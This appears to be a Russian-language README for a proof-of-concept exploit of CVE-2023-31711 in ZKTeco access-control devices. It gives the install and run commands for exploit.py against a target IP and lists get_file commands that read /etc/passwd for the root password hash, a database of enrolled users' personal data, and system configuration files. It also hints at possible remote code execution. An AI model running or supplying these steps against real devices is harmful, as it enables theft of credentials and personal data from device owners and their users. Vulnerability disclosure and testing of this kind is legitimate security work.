CVE-2023-31711
Некорректный контроль доступа в ZKTECO позволяет удалённым злоумышленникам читать любые файлы через административный API.
Установка необходимых модулей
- Внутри каталога ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
Запуск эксплойта
- Внутри каталога ZKTEco:
$ python exploit.py <ip_address>
Подключено к 10.0.2.25
(Cmd) get_file <file_name>
Примеры:
get_file /etc/passwd: раскрывает хэш пароля root
get_file /mnt/mtdblock/data/ZKDB.db: раскрывает PII зарегистрированных пользователей. Чтобы прочитать содержимое, вам может потребоваться последовательно выполнять эту команду, пока всё содержимое
не будет раскрыто
get_file /mnt/mtdblock/data/ZKSystem.db: раскрывает конфиденциальную информацию, связанную с системой
Благодарности
Примечание
Устройства также потенциально могут быть уязвимы к удалённому выполнению кода через использование административного API. Эксплойт, упомянутый в разделе благодарностей, может быть хорошим местом для поиска теста для этого.